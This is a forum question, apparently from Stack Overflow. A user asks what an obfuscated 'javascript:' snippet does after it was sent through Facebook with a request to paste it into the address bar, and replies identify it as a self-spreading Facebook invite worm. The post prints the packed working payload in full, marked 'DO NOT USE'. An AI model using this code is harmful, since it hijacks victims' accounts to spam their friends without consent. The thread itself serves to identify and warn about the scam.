# Can interpret this piece of javascript. Someone sent it to me through facebook and asked that I copy it into my address box -- I haven't

Tags: javascript

`DO NOT USE THIS!`
`javascript:(function(){a='app107489592636080_KxqAxK';b='app107489592636080_bGBstB';gASjYp='app107489592636080_gASjYp';kyFYLC='app107489592636080_kyFYLC';NGqzYj='app107489592636080_NGqzYj';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||NGqzYj|fs|SocialGraphManager|for|in|if|20|kyFYLC|gASjYp|21|2000|4000|3000'.split('|'),0,{}))})();`

Comment: This seems to be interesting.

Comment: This looks familiar to this : http://stackoverflow.com/questions/2634159/javascript-in-the-adress-bar-is-this-malicious

Comment: Here are some screenshots, if anyone is interested: 

Group Wall - http://i.imgur.com/wbHns.png  

Video Here tab (where the code is) - http://i.imgur.com/k9pIs.png  

Apparently, over half a million people have fell for it already.

Answer (score 8, accepted):

I think it is this one: [Reverse Engineering the newest Facebook invite virus](http://davezor.posterous.com/reverse-engineering-the-newest-facebook-invit)

Comment: Ahhh, thanks. They do look strikingly similar -- at least from a perspective of someone who knows nearly nothing about javascript.

I figured it at least invited all of my facebook friends (as I was seemingly, and unknowingly, invited by a friend). Apparently, that's all it does.

Maybe the creator of it plans on altering it to make it more malicious once that group has enough members?